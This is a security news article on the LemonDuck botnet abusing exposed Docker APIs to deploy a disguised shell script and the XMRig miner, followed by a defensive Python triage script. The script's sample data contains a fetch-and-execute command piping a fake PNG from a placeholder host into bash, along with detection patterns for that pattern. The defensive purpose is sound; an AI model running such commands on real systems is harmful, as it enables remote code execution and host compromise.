LemonDuck, a cross-platform cryptocurrency mining botnet, is targeting Docker to mine cryptocurrency on Linux systems as part of an active malware campaign.
“It runs an anonymous mining operation by the use of proxy pools, which hide the wallet addresses,” CrowdStrike said in a new report. “It evades detection by targeting Alibaba Cloud’s monitoring service and disabling it.”
Known to strike both Windows and Linux environments, LemonDuck is primarily engineered to abuse system resources to mine Monero. But it is also capable of credential theft, lateral movement, and facilitating the deployment of additional payloads for follow-on activities.
“It uses a wide range of spreading mechanisms — phishing emails, exploits, USB devices, brute force, among others — and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns,” Microsoft detailed in a technical write-up of the malware last July.
In early 2021, attack chains involving LemonDuck leveraged the then newly patched Exchange Server vulnerabilities to gain access to outdated Windows machines, before downloading backdoors and information stealers, including Ramnit.
The latest campaign spotted by CrowdStrike takes advantage of exposed Docker APIs as an initial access vector, using them to run a rogue container that retrieves a Bash shell script disguised as a harmless PNG image file from a remote server.
An analysis of historical data shows that similar image file droppers hosted on LemonDuck-associated domains have been put to use by the threat actor since at least January 2021, the cybersecurity firm noted.
The dropper files are key to launching the attack: the shell script downloads the actual payload, which then kills competing processes, disables Alibaba Cloud's monitoring services, and finally downloads and runs the XMRig coin miner.
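The two things a defender can check for from the chain described above are the initial access condition (a Docker daemon API reachable over TCP without client-certificate authentication) and the rogue container itself (a command that fetches a remote file, here one named as an image, and pipes it into a shell, often combined with a privileged flag or host mounts). The following triage script is an added example written for this article, not CrowdStrike's or Microsoft's tooling; the daemon.json fragments and `docker inspect` records it runs over are constructed, and the hostname `example.invalid` is a placeholder.

```python
import json
import re
import sys

# Constructed dockerd daemon.json fragments (not from the article).
# The first listens on plain TCP with no TLS client auth; the second requires client certificates.
DAEMON_CONFIG_EXPOSED = {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}
DAEMON_CONFIG_TLS = {
    "hosts": ["tcp://0.0.0.0:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
}

# Constructed records in the shape of `docker inspect` output (not real captures).
SAMPLE_INSPECT = [
    {
        "Name": "/webfront",
        "Config": {"Image": "nginx:1.21", "Entrypoint": None, "Cmd": ["nginx", "-g", "daemon off;"]},
        "HostConfig": {"Privileged": False, "Binds": None},
    },
    {
        "Name": "/miner-drop",
        "Config": {
            "Image": "alpine:latest",
            "Entrypoint": None,
            # A shell script served under an image name and piped straight into bash.
            "Cmd": ["sh", "-c", "curl -fsSL http://example.invalid/core.png | bash"],
        },
        "HostConfig": {"Privileged": True, "Binds": ["/:/mnt/host"]},
    },
]

# A download tool whose output is piped into a shell, and the stricter variant
# where the fetched URL carries an image extension.
FETCH_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b")
IMAGE_URL_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|;&]*\.(png|jpe?g|gif)\b[^|;&]*\|\s*(ba)?sh\b")
SENSITIVE_HOST_PREFIXES = ("/etc", "/root", "/proc", "/sys", "/var/run/docker.sock")


def exposed_api_listeners(daemon_config):
    """Return tcp:// listeners from a daemon.json 'hosts' list that do not require client certs."""
    if daemon_config.get("tlsverify", False):
        return []
    return [h for h in daemon_config.get("hosts", []) if h.startswith("tcp://")]


def _command_line(config):
    parts = (config.get("Entrypoint") or []) + (config.get("Cmd") or [])
    return " ".join(parts)


def triage_container(record):
    """Return a list of reasons a single inspect record looks like a rogue container."""
    reasons = []
    cmdline = _command_line(record.get("Config", {}))
    host_cfg = record.get("HostConfig", {}) or {}
    if FETCH_TO_SHELL.search(cmdline):
        reasons.append("command fetches a remote file and pipes it to a shell")
    if IMAGE_URL_TO_SHELL.search(cmdline):
        reasons.append("fetched URL has an image extension but is executed as a script")
    if host_cfg.get("Privileged"):
        reasons.append("privileged")
    for bind in host_cfg.get("Binds") or []:
        host_path = bind.split(":")[0]
        if host_path == "/" or host_path.startswith(SENSITIVE_HOST_PREFIXES):
            reasons.append(f"sensitive host path mounted: {host_path}")
    return reasons


def triage_containers(records):
    """Map container name -> reasons for every record that raised at least one flag."""
    flagged = {}
    for rec in records:
        reasons = triage_container(rec)
        if reasons:
            flagged[rec.get("Name", "?")] = reasons
    return flagged


if __name__ == "__main__":
    # Usage on a live host: docker inspect $(docker ps -q) | python3 triage.py
    records = json.load(sys.stdin) if not sys.stdin.isatty() else SAMPLE_INSPECT
    for name, reasons in triage_containers(records).items():
        print(name, "->", "; ".join(reasons))
```

The daemon check is deliberately strict: `tls: true` without `tlsverify` only encrypts the channel and still lets any client issue API calls, so only `tlsverify` clears a tcp:// listener. The container check is a triage aid, not a verdict; a legitimate bootstrap container can pipe curl into a shell, but one that also runs privileged with the host root mounted deserves a look.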
With compromised cloud instances becoming a hotbed for illicit cryptocurrency mining activities, the findings underscore the need to secure container hosts, starting with never exposing the Docker daemon API to the network without authentication, and to guard against risks throughout the software supply chain. Read more: https://bit.ly/3vIDXms